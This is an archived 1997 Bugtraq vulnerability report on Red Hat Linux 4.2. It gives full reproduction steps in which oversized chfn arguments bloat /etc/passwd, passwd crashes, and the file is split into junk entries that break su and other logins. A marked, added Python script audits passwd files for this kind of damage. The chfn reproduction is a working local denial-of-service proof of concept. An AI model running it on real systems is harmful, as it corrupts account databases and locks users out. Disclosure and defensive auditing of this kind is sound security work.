Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)
Alex Mottram (alex@NET-CONNECT.NET)
Fri, 19 Dec 1997 07:37:49 -0600
- Next message: Tim Newsham: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
- Previous message: Aleph One: "Administratrivia"
- Next in thread: Alec Muffett: "Re: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux"
I don't have the time to look into this much further, but it definitely
looks scary. I've tried it on 3 machines, and they all produce the same
results. For what it's worth, all 3 machines were installed from the
Redhat PowerTools 4.2 CD and have applied all relevant patches from
ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)
rpm -qf /usr/bin/chfn
util-linux-2.5-38
rpm -qf /usr/bin/passwd
passwd-0.50-7
rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
# THIS FILE IS NOW OBSOLETE
#
# The contents of this file should be replaced by files in the
# /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn  ftp   login  passwd  rlogin  samba  xdm
chsh  imap  other  rexec   rsh     su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so shadow nullok use_authtok
session    required     /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.

[alex@machine /tmp]$ wc /etc/passwd
     26      29    2068 /etc/passwd
** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **

[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully
** 'passwd' just snipped our one big line into nice 8k chunks **
** and created some junk passwd file entries. **

[zane@machine zane]$ wc /etc/passwd
     31      34   47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed. (ftp, pop-3, etc...)
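The post ends with a passwd file that no longer parses: one entry inflated by chfn, then cut into fixed-size pieces that become junk entries, so su and other services stop resolving users. The following audit script is an added example, not code from the post or from Red Hat; it parses a passwd-format file, flags entries that do not have the seven expected fields, have non-numeric uid/gid, or carry an implausibly long line or gecos field. The length thresholds and the embedded sample file (two sane entries, one with an oversized gecos field, and two line fragments of the kind left behind when a long line is split) are constructed assumptions for illustration.

```python
"""Audit a passwd-format file for entries that do not parse as seven
colon-separated fields or whose fields are implausibly long.

Added example (not from the original Bugtraq post). The thresholds and
the SAMPLE contents are assumptions chosen to illustrate the damage the
post describes: an entry blown up by chfn, then chopped into fixed-size
pieces by passwd.
"""

# Standard layout: name:passwd:uid:gid:gecos:dir:shell
PASSWD_FIELDS = 7
# Assumed limits for this audit; tune to local policy.
MAX_GECOS_LEN = 256
MAX_LINE_LEN = 1024


def audit_passwd(text):
    """Return a list of (line_number, reason) findings for a passwd-format
    string. A clean file yields an empty list."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            findings.append((lineno, "blank line"))
            continue
        if len(line) > MAX_LINE_LEN:
            findings.append((lineno, "entry is %d bytes long" % len(line)))
        fields = line.split(":")
        if len(fields) != PASSWD_FIELDS:
            # Fragments of a split line typically land here: too few colons.
            findings.append((lineno, "expected %d fields, got %d"
                             % (PASSWD_FIELDS, len(fields))))
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        if not name:
            findings.append((lineno, "empty user name"))
        elif name in seen:
            findings.append((lineno, "duplicate user name %r" % name))
        seen.add(name)
        for label, value in (("uid", uid), ("gid", gid)):
            if not value.isdigit():
                findings.append((lineno, "%s %r is not numeric" % (label, value)))
        if len(gecos) > MAX_GECOS_LEN:
            findings.append((lineno, "gecos field is %d bytes long" % len(gecos)))
        if not home.startswith("/"):
            findings.append((lineno, "home directory %r is not absolute" % home))
    return findings


# Constructed sample: two sane entries, one whose gecos field was inflated,
# and two fragments of the kind left when a long line is split into pieces.
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "zane:x:501:501:zane,,,,:/home/zane:/bin/bash\n"
    "alex:x:500:500:" + "X" * 3000 + ":/home/alex:/bin/bash\n"
    + "X" * 40 + "\n"
    + "X" * 20 + ":/home/alex:/bin/bash\n"
)

if __name__ == "__main__":
    import sys
    # Audit the file named on the command line, or the embedded sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path).read() if path else SAMPLE
    for lineno, reason in audit_passwd(data):
        print("line %d: %s" % (lineno, reason))
```

Run it as `python audit_passwd.py /etc/passwd` on a host to list suspect entries; with no argument it audits the embedded sample, reporting the oversized line 3 twice (total length and gecos length) and the two fragments on lines 4 and 5 as entries with the wrong field count.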